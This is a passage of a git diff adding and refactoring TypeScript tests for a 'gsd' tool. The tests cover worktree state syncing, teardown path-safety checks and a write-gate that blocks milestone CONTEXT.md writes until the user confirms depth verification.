+ *   - completed-units.json sync uses force:true (project root is authoritative)
+ */
+
+import {
+  mkdtempSync,
+  mkdirSync,
+  writeFileSync,
+  rmSync,
+  existsSync,
+  readFileSync,
+} from "node:fs";
+import { join } from "node:path";
+import { tmpdir } from "node:os";
+
+import { syncProjectRootToWorktree } from "../auto-worktree.ts";
+import { createTestContext } from "./test-helpers.ts";
+
+const { assertTrue, assertEq, report } = createTestContext();
+
+function createBase(name: string): string {
+  const base = mkdtempSync(join(tmpdir(), `gsd-wt-1886-${name}-`));
+  mkdirSync(join(base, ".gsd", "milestones"), { recursive: true });
+  return base;
+}
+
+function cleanup(base: string): void {
+  rmSync(base, { recursive: true, force: true });
+}
+
+async function main(): Promise<void> {
+  // ─── 1. Worktree VALIDATION.md must NOT be overwritten by project root ──
+  console.log(
+    "\n=== 1. #1886: worktree VALIDATION.md preserved (not overwritten) ===",
+  );
+  {
+    const mainBase = createBase("main");
+    const wtBase = createBase("wt");
+
+    try {
+      // Project root has an older CONTEXT but no VALIDATION
+      const prM004 = join(mainBase, ".gsd", "milestones", "M004");
+      mkdirSync(prM004, { recursive: true });
+      writeFileSync(join(prM004, "M004-CONTEXT.md"), "# old context");
+
+      // Worktree has CONTEXT + VALIDATION (written by validate-milestone)
+      const wtM004 = join(wtBase, ".gsd", "milestones", "M004");
+      mkdirSync(wtM004, { recursive: true });
+      writeFileSync(join(wtM004, "M004-CONTEXT.md"), "# worktree context");
+      writeFileSync(
+        join(wtM004, "M004-VALIDATION.md"),
+        "verdict: pass\nremediation_round: 1",
+      );
+
+      syncProjectRootToWorktree(mainBase, wtBase, "M004");
+
+      // VALIDATION.md must still exist in worktree
+      assertTrue(
+        existsSync(join(wtM004, "M004-VALIDATION.md")),
+        "#1886: VALIDATION.md still exists after sync",
+      );
+      assertEq(
+        readFileSync(join(wtM004, "M004-VALIDATION.md"), "utf-8"),
+        "verdict: pass\nremediation_round: 1",
+        "#1886: VALIDATION.md content preserved",
+      );
+
+      // CONTEXT.md should NOT be overwritten — worktree version is authoritative
+      assertEq(
+        readFileSync(join(wtM004, "M004-CONTEXT.md"), "utf-8"),
+        "# worktree context",
+        "#1886: existing worktree CONTEXT.md not overwritten",
+      );
+    } finally {
+      cleanup(mainBase);
+      cleanup(wtBase);
+    }
+  }
+
+  // ─── 2. Missing files ARE still copied from project root ────────────────
+  console.log("\n=== 2. #1886: missing worktree files still copied ===");
+  {
+    const mainBase = createBase("main");
+    const wtBase = createBase("wt");
+
+    try {
+      const prM004 = join(mainBase, ".gsd", "milestones", "M004");
+      mkdirSync(prM004, { recursive: true });
+      writeFileSync(join(prM004, "M004-CONTEXT.md"), "# from project root");
+      writeFileSync(join(prM004, "M004-ROADMAP.md"), "# roadmap");
+
+      // Worktree has no M004 directory at all
+      syncProjectRootToWorktree(mainBase, wtBase, "M004");
+
+      assertTrue(
+        existsSync(join(wtBase, ".gsd", "milestones", "M004", "M004-CONTEXT.md")),
+        "#1886: missing CONTEXT.md copied from project root",
+      );
+      assertTrue(
+        existsSync(join(wtBase, ".gsd", "milestones", "M004", "M004-ROADMAP.md")),
+        "#1886: missing ROADMAP.md copied from project root",
+      );
+    } finally {
+      cleanup(mainBase);
+      cleanup(wtBase);
+    }
+  }
+
+  // ─── 3. completed-units.json forward-synced from project root ───────────
+  console.log(
+    "\n=== 3. #1886: completed-units.json forward-synced to worktree ===",
+  );
+  {
+    const mainBase = createBase("main");
+    const wtBase = createBase("wt");
+
+    try {
+      // Project root has completed units (authoritative after crash recovery)
+      writeFileSync(
+        join(mainBase, ".gsd", "completed-units.json"),
+        JSON.stringify(["validate-milestone/M004"]),
+      );
+
+      // Worktree has empty completed-units
+      writeFileSync(
+        join(wtBase, ".gsd", "completed-units.json"),
+        JSON.stringify([]),
+      );
+
+      syncProjectRootToWorktree(mainBase, wtBase, "M004");
+
+      const wtCompleted = JSON.parse(
+        readFileSync(join(wtBase, ".gsd", "completed-units.json"), "utf-8"),
+      );
+      assertEq(
+        wtCompleted,
+        ["validate-milestone/M004"],
+        "#1886: completed-units.json synced from project root (force:true)",
+      );
+    } finally {
+      cleanup(mainBase);
+      cleanup(wtBase);
+    }
+  }
+
+  // ─── 4. completed-units.json: no-op when project root has no file ───────
+  console.log(
+    "\n=== 4. #1886: completed-units.json no-op when missing in project root ===",
+  );
+  {
+    const mainBase = createBase("main");
+    const wtBase = createBase("wt");
+
+    try {
+      // Project root milestone dir must exist for sync to run
+      const prM004 = join(mainBase, ".gsd", "milestones", "M004");
+      mkdirSync(prM004, { recursive: true });
+
+      // No completed-units.json in project root
+      // Worktree has its own
+      writeFileSync(
+        join(wtBase, ".gsd", "completed-units.json"),
+        JSON.stringify(["some-unit/M001"]),
+      );
+
+      syncProjectRootToWorktree(mainBase, wtBase, "M004");
+
+      const wtCompleted = JSON.parse(
+        readFileSync(join(wtBase, ".gsd", "completed-units.json"), "utf-8"),
+      );
+      assertEq(
+        wtCompleted,
+        ["some-unit/M001"],
+        "#1886: worktree completed-units.json untouched when project root has none",
+      );
+    } finally {
+      cleanup(mainBase);
+      cleanup(wtBase);
+    }
+  }
+
+  report();
+}
+
+main().catch((error) => {
+  console.error(error);
+  process.exit(1);
+});
diff --git a/src/resources/extensions/gsd/tests/worktree-sync-tasks.test.ts b/src/resources/extensions/gsd/tests/worktree-sync-tasks.test.ts
index 43d57c59e..65717415c 100644
--- a/src/resources/extensions/gsd/tests/worktree-sync-tasks.test.ts
+++ b/src/resources/extensions/gsd/tests/worktree-sync-tasks.test.ts
@@ -47,7 +47,8 @@ function writeFile(dir: string, relativePath: string, content: string): void {
 test("syncWorktreeStateBack copies task summaries from tasks/ subdirectory (#1678)", () => {
   const mainBase = makeTempDir("main");
   const wtBase = makeTempDir("wt");
-  const mid = "M001";
+  const currentMid = "M000"; // milestone being merged (skipped by sync)
+  const mid = "M001";        // other milestone that should be synced
 
   try {
     // Set up worktree with milestone, slice, and task files
@@ -64,8 +65,8 @@ test("syncWorktreeStateBack copies task summaries from tasks/ subdirectory (#167
     // Set up main with empty .gsd
     mkdirSync(join(mainBase, ".gsd"), { recursive: true });
 
-    // Run sync
-    const result = syncWorktreeStateBack(mainBase, wtBase, mid);
+    // Run sync — currentMid is skipped, mid (M001) should be synced
+    const result = syncWorktreeStateBack(mainBase, wtBase, currentMid);
 
     // Verify milestone-level files synced
     assert.ok(
@@ -126,7 +127,8 @@ test("syncWorktreeStateBack copies task summaries from tasks/ subdirectory (#167
 test("syncWorktreeStateBack handles multiple slices with tasks (#1678)", () => {
   const mainBase = makeTempDir("main");
   const wtBase = makeTempDir("wt");
-  const mid = "M002";
+  const currentMid = "M000"; // milestone being merged (skipped)
+  const mid = "M002";        // other milestone that should be synced
 
   try {
     // Set up two slices with tasks
@@ -139,7 +141,7 @@ test("syncWorktreeStateBack handles multiple slices with tasks (#1678)", () => {
 
     mkdirSync(join(mainBase, ".gsd"), { recursive: true });
 
-    const result = syncWorktreeStateBack(mainBase, wtBase, mid);
+    const result = syncWorktreeStateBack(mainBase, wtBase, currentMid);
 
     // All task summaries from both slices should be synced
     assert.ok(existsSync(join(mainBase, `.gsd/milestones/${mid}/slices/S01/tasks/T01-SUMMARY.md`)));
@@ -160,7 +162,8 @@ test("syncWorktreeStateBack handles multiple slices with tasks (#1678)", () => {
 test("syncWorktreeStateBack handles slices without tasks/ directory", () => {
   const mainBase = makeTempDir("main");
   const wtBase = makeTempDir("wt");
-  const mid = "M003";
+  const currentMid = "M000"; // milestone being merged (skipped)
+  const mid = "M003";        // other milestone that should be synced
 
   try {
     // Slice with no tasks/ subdirectory (legitimate case: pre-planning)
@@ -168,7 +171,7 @@ test("syncWorktreeStateBack handles slices without tasks/ directory", () => {
 
     mkdirSync(join(mainBase, ".gsd"), { recursive: true });
 
-    const result = syncWorktreeStateBack(mainBase, wtBase, mid);
+    const result = syncWorktreeStateBack(mainBase, wtBase, currentMid);
 
     // Should sync the slice file without errors
     assert.ok(existsSync(join(mainBase, `.gsd/milestones/${mid}/slices/S01/S01-RESEARCH.md`)));
@@ -183,7 +186,8 @@ test("syncWorktreeStateBack handles slices without tasks/ directory", () => {
 test("syncWorktreeStateBack ignores non-md files in tasks/", () => {
   const mainBase = makeTempDir("main");
   const wtBase = makeTempDir("wt");
-  const mid = "M004";
+  const currentMid = "M000"; // milestone being merged (skipped)
+  const mid = "M004";        // other milestone that should be synced
 
   try {
     writeFile(wtBase, `.gsd/milestones/${mid}/slices/S01/S01-PLAN.md`, "# Plan\n");
@@ -194,7 +198,7 @@ test("syncWorktreeStateBack ignores non-md files in tasks/", () => {
 
     mkdirSync(join(mainBase, ".gsd"), { recursive: true });
 
-    const result = syncWorktreeStateBack(mainBase, wtBase, mid);
+    const result = syncWorktreeStateBack(mainBase, wtBase, currentMid);
 
     // Only .md files should be synced
     assert.ok(existsSync(join(mainBase, `.gsd/milestones/${mid}/slices/S01/tasks/T01-SUMMARY.md`)));
diff --git a/src/resources/extensions/gsd/tests/worktree-teardown-safety.test.ts b/src/resources/extensions/gsd/tests/worktree-teardown-safety.test.ts
new file mode 100644
index 000000000..e6f9ef134
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/worktree-teardown-safety.test.ts
@@ -0,0 +1,148 @@
+/**
+ * worktree-teardown-safety.test.ts — Regression test for #2365.
+ *
+ * Ensures that removeWorktree() and teardownAutoWorktree() never delete
+ * directories outside .gsd/worktrees/.  The bug: removeWorktree overrides
+ * the computed worktree path with whatever `git worktree list` reports.
+ * When .gsd/ was (or is) a symlink, git resolves the symlink at creation
+ * time, so its registered path can point to an external directory.  If that
+ * external path happens to be a project data directory, teardown destroys it.
+ *
+ * The fix adds path validation so rmSync / nativeWorktreeRemove only operate
+ * on paths that are actually under .gsd/worktrees/.
+ */
+
+import {
+  mkdtempSync,
+  mkdirSync,
+  writeFileSync,
+  rmSync,
+  existsSync,
+  realpathSync,
+  readFileSync,
+} from "node:fs";
+import { join } from "node:path";
+import { tmpdir } from "node:os";
+import { execSync } from "node:child_process";
+import { describe, it, after } from "node:test";
+
+import { createWorktree, removeWorktree, worktreePath, isInsideWorktreesDir } from "../worktree-manager.ts";
+import { createTestContext } from "./test-helpers.ts";
+
+const { assertEq, assertTrue, report } = createTestContext();
+
+// ─── Helpers ──────────────────────────────────────────────────────────────
+
+function run(command: string, cwd: string): string {
+  return execSync(command, { cwd, stdio: ["ignore", "pipe", "pipe"], encoding: "utf-8" }).trim();
+}
+
+function createTempRepo(): string {
+  const dir = realpathSync(mkdtempSync(join(tmpdir(), "wt-safety-test-")));
+  run("git init", dir);
+  run("git config user.email test@test.com", dir);
+  run("git config user.name Test", dir);
+  writeFileSync(join(dir, "README.md"), "# test\n");
+  run("git add .", dir);
+  run("git commit -m init", dir);
+  run("git branch -M main", dir);
+  return dir;
+}
+
+// ─── Tests ────────────────────────────────────────────────────────────────
+
+describe("worktree-teardown-safety", () => {
+  const dirs: string[] = [];
+
+  after(() => {
+    for (const d of dirs) rmSync(d, { recursive: true, force: true });
+    report();
+  });
+
+  it("removeWorktree does not delete sibling data directories", () => {
+    const tempDir = createTempRepo();
+    dirs.push(tempDir);
+
+    // Create a project data directory that lives alongside .gsd/
+    const dataDir = join(tempDir, "project-data");
+    mkdirSync(dataDir, { recursive: true });
+    writeFileSync(join(dataDir, "important.db"), "precious data");
+
+    // Create a worktree normally
+    const wt = createWorktree(tempDir, "test-wt");
+    assertTrue(existsSync(wt.path), "worktree created successfully");
+
+    // Remove the worktree
+    removeWorktree(tempDir, "test-wt");
+
+    // The worktree directory should be gone
+    assertTrue(!existsSync(wt.path), "worktree directory removed");
+
+    // The project data directory MUST still exist
+    assertTrue(existsSync(dataDir), "project data directory survives teardown");
+    assertTrue(
+      existsSync(join(dataDir, "important.db")),
+      "project data files survive teardown",
+    );
+  });
+
+  it("path validation rejects paths outside .gsd/worktrees/", () => {
+    const tempDir = createTempRepo();
+    dirs.push(tempDir);
+
+    const externalDir = join(tempDir, "external-state");
+    mkdirSync(externalDir, { recursive: true });
+    writeFileSync(join(externalDir, "state.json"), '{"critical": true}');
+
+    // Create and then remove a worktree that has a legitimate path
+    const wt2 = createWorktree(tempDir, "safe-wt");
+    assertTrue(existsSync(wt2.path), "second worktree created");
+
+    removeWorktree(tempDir, "safe-wt");
+    assertTrue(!existsSync(wt2.path), "second worktree removed cleanly");
+
+    // External directory must be untouched
+    assertTrue(existsSync(externalDir), "external directory survives second teardown");
+    assertEq(
+      readFileSync(join(externalDir, "state.json"), "utf-8"),
+      '{"critical": true}',
+      "external directory contents intact after teardown",
+    );
+  });
+
+  it("worktreePath always returns paths under .gsd/worktrees/", () => {
+    const tempDir = createTempRepo();
+    dirs.push(tempDir);
+
+    const wtPathResult = worktreePath(tempDir, "anything");
+    assertTrue(
+      wtPathResult.startsWith(join(tempDir, ".gsd", "worktrees")),
+      "worktreePath returns path under .gsd/worktrees/",
+    );
+  });
+
+  it("isInsideWorktreesDir rejects path traversal attempts", () => {
+    const tempDir = createTempRepo();
+    dirs.push(tempDir);
+
+    assertTrue(
+      isInsideWorktreesDir(tempDir, join(tempDir, ".gsd", "worktrees", "my-wt")),
+      "path inside .gsd/worktrees/ is accepted",
+    );
+
+    assertTrue(
+      !isInsideWorktreesDir(tempDir, join(tempDir, "project-data")),
+      "path outside .gsd/worktrees/ is rejected",
+    );
+
+    assertTrue(
+      !isInsideWorktreesDir(tempDir, join(tempDir, ".gsd", "worktrees", "..", "..", "project-data")),
+      "path traversal via .. is rejected",
+    );
+
+    assertTrue(
+      !isInsideWorktreesDir(tempDir, "/tmp/some-other-dir"),
+      "completely external path is rejected",
+    );
+  });
+});
diff --git a/src/resources/extensions/gsd/tests/worktree.test.ts b/src/resources/extensions/gsd/tests/worktree.test.ts
index f1829de04..a23f925eb 100644
--- a/src/resources/extensions/gsd/tests/worktree.test.ts
+++ b/src/resources/extensions/gsd/tests/worktree.test.ts
@@ -14,12 +14,14 @@ import {
   resolveProjectRoot,
   setActiveMilestoneId,
   SLICE_BRANCH_RE,
+  _resetServiceCache,
 } from "../worktree.ts";
 import { readIntegrationBranch } from "../git-service.ts";
 import { _resetHasChangesCache } from "../native-git-bridge.ts";
-import { createTestContext } from './test-helpers.ts';
+import { _clearGsdRootCache } from "../paths.ts";
+import { describe, test } from 'node:test';
+import assert from 'node:assert/strict';
 
-const { assertEq, assertTrue, report } = createTestContext();
 
 /**
  * Normalize a path for reliable comparison on Windows CI runners.
@@ -47,56 +49,56 @@ writeFileSync(join(base, ".gsd", "milestones", "M001", "slices", "S01", "S01-PLA
 run("git add .", base);
 run('git commit -m "chore: init"', base);
 
-async function main(): Promise<void> {
+describe('worktree', async () => {
 
   console.log("\n=== autoCommitCurrentBranch ===");
   // Clean — should return null
   const cleanResult = autoCommitCurrentBranch(base, "execute-task", "M001/S01/T01");
-  assertEq(cleanResult, null, "returns null for clean repo");
+  assert.deepStrictEqual(cleanResult, null, "returns null for clean repo");
 
   // Make dirty — reset the nativeHasChanges cache so the fresh dirt is detected
   _resetHasChangesCache();
   writeFileSync(join(base, "dirty.txt"), "uncommitted\n", "utf-8");
   const dirtyResult = autoCommitCurrentBranch(base, "execute-task", "M001/S01/T01");
-  assertTrue(dirtyResult !== null, "returns commit message for dirty repo");
-  assertTrue(dirtyResult!.includes("M001/S01/T01"), "commit message includes unit id");
-  assertEq(run("git status --short", base), "", "repo is clean after auto-commit");
+  assert.ok(dirtyResult !== null, "returns commit message for dirty repo");
+  assert.ok(dirtyResult!.includes("M001/S01/T01"), "commit message includes unit id");
+  assert.deepStrictEqual(run("git status --short", base), "", "repo is clean after auto-commit");
 
   console.log("\n=== getSliceBranchName ===");
-  assertEq(getSliceBranchName("M001", "S01"), "gsd/M001/S01", "branch name format correct");
-  assertEq(getSliceBranchName("M001", "S01", null), "gsd/M001/S01", "null worktree = plain branch");
-  assertEq(getSliceBranchName("M001", "S01", "my-wt"), "gsd/my-wt/M001/S01", "worktree-namespaced branch");
+  assert.deepStrictEqual(getSliceBranchName("M001", "S01"), "gsd/M001/S01", "branch name format correct");
+  assert.deepStrictEqual(getSliceBranchName("M001", "S01", null), "gsd/M001/S01", "null worktree = plain branch");
+  assert.deepStrictEqual(getSliceBranchName("M001", "S01", "my-wt"), "gsd/my-wt/M001/S01", "worktree-namespaced branch");
 
   console.log("\n=== parseSliceBranch ===");
   const plain = parseSliceBranch("gsd/M001/S01");
-  assertTrue(plain !== null, "parses plain branch");
-  assertEq(plain!.worktreeName, null, "plain branch has no worktree name");
-  assertEq(plain!.milestoneId, "M001", "plain branch milestone");
-  assertEq(plain!.sliceId, "S01", "plain branch slice");
+  assert.ok(plain !== null, "parses plain branch");
+  assert.deepStrictEqual(plain!.worktreeName, null, "plain branch has no worktree name");
+  assert.deepStrictEqual(plain!.milestoneId, "M001", "plain branch milestone");
+  assert.deepStrictEqual(plain!.sliceId, "S01", "plain branch slice");
 
   const namespaced = parseSliceBranch("gsd/feature-auth/M001/S01");
-  assertTrue(namespaced !== null, "parses worktree-namespaced branch");
-  assertEq(namespaced!.worktreeName, "feature-auth", "worktree name extracted");
-  assertEq(namespaced!.milestoneId, "M001", "namespaced branch milestone");
-  assertEq(namespaced!.sliceId, "S01", "namespaced branch slice");
+  assert.ok(namespaced !== null, "parses worktree-namespaced branch");
+  assert.deepStrictEqual(namespaced!.worktreeName, "feature-auth", "worktree name extracted");
+  assert.deepStrictEqual(namespaced!.milestoneId, "M001", "namespaced branch milestone");
+  assert.deepStrictEqual(namespaced!.sliceId, "S01", "namespaced branch slice");
 
   const invalid = parseSliceBranch("main");
-  assertEq(invalid, null, "non-slice branch returns null");
+  assert.deepStrictEqual(invalid, null, "non-slice branch returns null");
 
   const worktreeBranch = parseSliceBranch("worktree/foo");
-  assertEq(worktreeBranch, null, "worktree/ prefix is not a slice branch");
+  assert.deepStrictEqual(worktreeBranch, null, "worktree/ prefix is not a slice branch");
 
   console.log("\n=== SLICE_BRANCH_RE ===");
-  assertTrue(SLICE_BRANCH_RE.test("gsd/M001/S01"), "regex matches plain branch");
-  assertTrue(SLICE_BRANCH_RE.test("gsd/my-wt/M001/S01"), "regex matches worktree branch");
-  assertTrue(!SLICE_BRANCH_RE.test("main"), "regex rejects main");
-  assertTrue(!SLICE_BRANCH_RE.test("gsd/"), "regex rejects bare gsd/");
-  assertTrue(!SLICE_BRANCH_RE.test("worktree/foo"), "regex rejects worktree/foo");
+  assert.ok(SLICE_BRANCH_RE.test("gsd/M001/S01"), "regex matches plain branch");
+  assert.ok(SLICE_BRANCH_RE.test("gsd/my-wt/M001/S01"), "regex matches worktree branch");
+  assert.ok(!SLICE_BRANCH_RE.test("main"), "regex rejects main");
+  assert.ok(!SLICE_BRANCH_RE.test("gsd/"), "regex rejects bare gsd/");
+  assert.ok(!SLICE_BRANCH_RE.test("worktree/foo"), "regex rejects worktree/foo");
 
   console.log("\n=== detectWorktreeName ===");
-  assertEq(detectWorktreeName("/projects/myapp"), null, "no worktree in plain path");
-  assertEq(detectWorktreeName("/projects/myapp/.gsd/worktrees/feature-auth"), "feature-auth", "detects worktree name");
-  assertEq(detectWorktreeName("/projects/myapp/.gsd/worktrees/my-wt/subdir"), "my-wt", "detects worktree with subdir");
+  assert.deepStrictEqual(detectWorktreeName("/projects/myapp"), null, "no worktree in plain path");
+  assert.deepStrictEqual(detectWorktreeName("/projects/myapp/.gsd/worktrees/feature-auth"), "feature-auth", "detects worktree name");
+  assert.deepStrictEqual(detectWorktreeName("/projects/myapp/.gsd/worktrees/my-wt/subdir"), "my-wt", "detects worktree with subdir");
 
   // ═══════════════════════════════════════════════════════════════════════
   // Integration branch — facade-level tests
@@ -115,16 +117,16 @@ async function main(): Promise<void> {
     run("git add -A && git commit -m init", repo);
 
     run("git checkout -b f-123-thing", repo);
-    assertEq(getCurrentBranch(repo), "f-123-thing", "on feature branch");
+    assert.deepStrictEqual(getCurrentBranch(repo), "f-123-thing", "on feature branch");
 
     const commitsBefore = run("git rev-list --count HEAD", repo);
     captureIntegrationBranch(repo, "M001");
-    assertEq(readIntegrationBranch(repo, "M001"), "f-123-thing",
+    assert.deepStrictEqual(readIntegrationBranch(repo, "M001"), "f-123-thing",
       "captureIntegrationBranch records the current branch");
 
     // Metadata is stored in external state, not committed to git.
     const commitsAfter = run("git rev-list --count HEAD", repo);
-    assertEq(commitsAfter, commitsBefore, "captureIntegrationBranch does not create a git commit");
+    assert.deepStrictEqual(commitsAfter, commitsBefore, "captureIntegrationBranch does not create a git commit");
 
     rmSync(repo, { recursive: true, force: true });
   }
@@ -144,7 +146,7 @@ async function main(): Promise<void> {
     run("git checkout -b gsd/M001/S01", repo);
     captureIntegrationBranch(repo, "M001");
 
-    assertEq(readIntegrationBranch(repo, "M001"), null,
+    assert.deepStrictEqual(readIntegrationBranch(repo, "M001"), null,
       "capture from slice branch is a no-op");
 
     rmSync(repo, { recursive: true, force: true });
@@ -165,37 +167,52 @@ async function main(): Promise<void> {
     run("git checkout -b my-feature", repo);
     captureIntegrationBranch(repo, "M001");
 
-    // Without milestone set, getMainBranch returns "main"
-    setActiveMilestoneId(repo, null);
-    assertEq(getMainBranch(repo), "main",
-      "getMainBranch returns main without milestone set");
+    // Isolate from user's global preferences (which may have git.main_branch set).
+    // Reset caches so getService() creates a fresh instance with empty preferences.
+    const originalHome = process.env.HOME;
+    const fakeHome = mkdtempSync(join(tmpdir(), "gsd-fake-home-"));
+    process.env.HOME = fakeHome;
+    _clearGsdRootCache();
+    _resetServiceCache();
 
-    // With milestone set, getMainBranch returns feature branch
-    setActiveMilestoneId(repo, "M001");
-    assertEq(getMainBranch(repo), "my-feature",
-      "getMainBranch returns integration branch with milestone set");
+    try {
+      // Without milestone set, getMainBranch returns "main"
+      setActiveMilestoneId(repo, null);
+      assert.deepStrictEqual(getMainBranch(repo), "main",
+        "getMainBranch returns main without milestone set");
+
+      // With milestone set, getMainBranch returns feature branch
+      setActiveMilestoneId(repo, "M001");
+      assert.deepStrictEqual(getMainBranch(repo), "my-feature",
+        "getMainBranch returns integration branch with milestone set");
+    } finally {
+      process.env.HOME = originalHome;
+      _clearGsdRootCache();
+      _resetServiceCache();
+      rmSync(fakeHome, { recursive: true, force: true });
+    }
 
     rmSync(repo, { recursive: true, force: true });
   }
 
   // ── detectWorktreeName: symlink-resolved paths ───────────────────────────
   console.log("\n=== detectWorktreeName (symlink-resolved paths) ===");
-  assertEq(
+  assert.deepStrictEqual(
     detectWorktreeName("/Users/fran/.gsd/projects/89e1c9ad49bf/worktrees/M001"),
     "M001",
     "detects milestone in symlink-resolved path",
   );
-  assertEq(
+  assert.deepStrictEqual(
     detectWorktreeName("/Users/fran/.gsd/projects/abc123/worktrees/M002/subdir"),
     "M002",
     "detects milestone with trailing subdir in symlink-resolved path",
   );
-  assertEq(
+  assert.deepStrictEqual(
     detectWorktreeName("/Users/fran/.gsd/projects/abc123"),
     null,
     "returns null for project root without worktrees segment",
   );
-  assertEq(
+  assert.deepStrictEqual(
     detectWorktreeName("/foo/.gsd/worktrees/M001"),
     "M001",
     "still detects direct layout path",
@@ -211,7 +228,7 @@ async function main(): Promise<void> {
   
   // With GSD_PROJECT_ROOT env var set (layer 1 — coordinator passes it)
   process.env.GSD_PROJECT_ROOT = "/real/project";
-  assertEq(
+  assert.deepStrictEqual(
     resolveProjectRoot("/Users/fran/.gsd/projects/89e1c9ad49bf/worktrees/M001"),
     "/real/project",
     "uses GSD_PROJECT_ROOT when set",
@@ -219,7 +236,7 @@ async function main(): Promise<void> {
   delete process.env.GSD_PROJECT_ROOT;
 
   // Without GSD_PROJECT_ROOT, direct layout still works (no ~/.gsd collision)
-  assertEq(
+  assert.deepStrictEqual(
     resolveProjectRoot("/some/repo"),
     "/some/repo",
     "ignores GSD_PROJECT_ROOT override for non-worktree paths",
@@ -227,19 +244,19 @@ async function main(): Promise<void> {
   delete process.env.GSD_PROJECT_ROOT;
 
   // Without GSD_PROJECT_ROOT, direct layout still works (no ~/.gsd collision)
-  assertEq(
+  assert.deepStrictEqual(
     resolveProjectRoot("/foo/.gsd/worktrees/M001"),
     "/foo",
     "still resolves direct layout path",
   );
-  assertEq(
+  assert.deepStrictEqual(
     resolveProjectRoot("/some/repo"),
     "/some/repo",
     "returns unchanged for non-worktree path",
   );
 
   // Without GSD_PROJECT_ROOT, direct layout with nested subdirs
-  assertEq(
+  assert.deepStrictEqual(
     resolveProjectRoot("/data/.gsd/worktrees/M003/nested"),
     "/data",
     "resolves correctly with nested subdirs after worktree name (direct layout)",
@@ -264,7 +281,7 @@ async function main(): Promise<void> {
     mkdirSync(deep, { recursive: true });
 
     process.env.GSD_HOME = join(fakeHome, ".gsd");
-    assertEq(
+    assert.deepStrictEqual(
       normalizePath(resolveProjectRoot(realpathSync(deep))),
       normalizePath(project),
       "resolves to real project root from deep symlink-resolved worktree path",
@@ -276,10 +293,4 @@ async function main(): Promise<void> {
   }
 
   rmSync(base, { recursive: true, force: true });
-  report();
-}
-
-main().catch((error) => {
-  console.error(error);
-  process.exit(1);
 });
diff --git a/src/resources/extensions/gsd/tests/write-gate.test.ts b/src/resources/extensions/gsd/tests/write-gate.test.ts
index 8ca4ee7b5..48c0c5524 100644
--- a/src/resources/extensions/gsd/tests/write-gate.test.ts
+++ b/src/resources/extensions/gsd/tests/write-gate.test.ts
@@ -3,22 +3,23 @@
  *
  * Exercises shouldBlockContextWrite() — a pure function that implements:
  *   (a) toolName !== "write" → pass
- *   (b) milestoneId null → pass (not in discussion)
+ *   (b) milestone context must resolve to a verified milestone
  *   (c) path doesn't match /M\d+-CONTEXT\.md$/ → pass
- *   (d) depthVerified → pass
+ *   (d) non-context files → pass
  *   (e) else → block with actionable reason
  */
 
 import test from 'node:test';
 import assert from 'node:assert/strict';
 import {
+  isDepthConfirmationAnswer,
   shouldBlockContextWrite,
-  isDepthVerified,
-  isQueuePhaseActive,
   setQueuePhaseActive,
 } from '../index.ts';
 import {
   markDepthVerified,
+  isMilestoneDepthVerified,
+  shouldBlockContextArtifactSave,
   clearDiscussionFlowState,
   resetWriteGateState,
 } from '../bootstrap/write-gate.ts';
@@ -52,26 +53,27 @@ test('write-gate: blocks CONTEXT.md write during discussion without depth verifi
 // ─── Scenario 3: Allows CONTEXT.md write after depth verification ──
 
 test('write-gate: allows CONTEXT.md write after depth verification', () => {
+  clearDiscussionFlowState();
+  markDepthVerified('M001');
   const result = shouldBlockContextWrite(
     'write',
     '/Users/dev/project/.gsd/milestones/M001/M001-CONTEXT.md',
     'M001',
-    true,
   );
   assert.strictEqual(result.block, false, 'should not block after depth verification');
   assert.strictEqual(result.reason, undefined, 'should have no reason');
+  clearDiscussionFlowState();
 });
 
-// ─── Scenario 4: Allows CONTEXT.md write outside discussion phase (milestoneId null) ──
+// ─── Scenario 4: Ambiguous session context no longer bypasses the gate ──
 
-test('write-gate: allows CONTEXT.md write outside discussion phase', () => {
+test('write-gate: blocks CONTEXT.md write when milestoneId is ambiguous', () => {
   const result = shouldBlockContextWrite(
     'write',
     '.gsd/milestones/M001/M001-CONTEXT.md',
     null,
-    false,
   );
-  assert.strictEqual(result.block, false, 'should not block outside discussion phase');
+  assert.strictEqual(result.block, true, 'should block when milestone context is ambiguous');
 });
 
 // ─── Scenario 5: Allows non-CONTEXT.md writes during discussion ──
@@ -82,7 +84,6 @@ test('write-gate: allows non-CONTEXT.md writes during discussion', () => {
     'write',
     '.gsd/milestones/M001/M001-DISCUSSION.md',
     'M001',
-    false,
   );
   assert.strictEqual(r1.block, false, 'DISCUSSION.md should pass');
 
@@ -91,7 +92,6 @@ test('write-gate: allows non-CONTEXT.md writes during discussion', () => {
     'write',
     '.gsd/milestones/M001/slices/S01/S01-PLAN.md',
     'M001',
-    false,
   );
   assert.strictEqual(r2.block, false, 'slice plan should pass');
 
@@ -100,7 +100,6 @@ test('write-gate: allows non-CONTEXT.md writes during discussion', () => {
     'write',
     'src/index.ts',
     'M001',
-    false,
   );
   assert.strictEqual(r3.block, false, 'regular code file should pass');
 });
@@ -112,23 +111,23 @@ test('write-gate: regex does not match slice context files (S01-CONTEXT.md)', ()
     'write',
     '.gsd/milestones/M001/slices/S01/S01-CONTEXT.md',
     'M001',
-    false,
   );
   assert.strictEqual(result.block, false, 'S01-CONTEXT.md should not be blocked');
 });
 
-// ─── Scenario 7: Error message contains actionable instruction ──
+// ─── Scenario 7: Error message contains actionable instruction and anti-bypass language ──
 
-test('write-gate: blocked reason contains depth_verification keyword', () => {
+test('write-gate: blocked reason contains depth_verification keyword and anti-bypass language', () => {
   const result = shouldBlockContextWrite(
     'write',
     '.gsd/milestones/M999/M999-CONTEXT.md',
     'M999',
-    false,
   );
   assert.strictEqual(result.block, true);
   assert.ok(result.reason!.includes('depth_verification'), 'reason should mention depth_verification question id');
   assert.ok(result.reason!.includes('ask_user_questions'), 'reason should mention ask_user_questions tool');
+  assert.ok(result.reason!.includes('MUST NOT'), 'reason should include anti-bypass language');
+  assert.ok(result.reason!.includes('(Recommended)'), 'reason should specify the required confirmation option');
 });
 
 // ─── Scenario 8: Queue mode blocks CONTEXT.md write without depth verification ──
@@ -138,7 +137,6 @@ test('write-gate: blocks CONTEXT.md write in queue mode without depth verificati
     'write',
     '.gsd/milestones/M001/M001-CONTEXT.md',
     null,   // no milestoneId in queue mode
-    false,  // not depth-verified
     true,   // queue phase active
   );
   assert.strictEqual(result.block, true, 'should block in queue mode without depth verification');
@@ -148,46 +146,348 @@ test('write-gate: blocks CONTEXT.md write in queue mode without depth verificati
 // ─── Scenario 9: Queue mode allows CONTEXT.md write after depth verification ──
 
 test('write-gate: allows CONTEXT.md write in queue mode after depth verification', () => {
+  clearDiscussionFlowState();
+  markDepthVerified('M001');
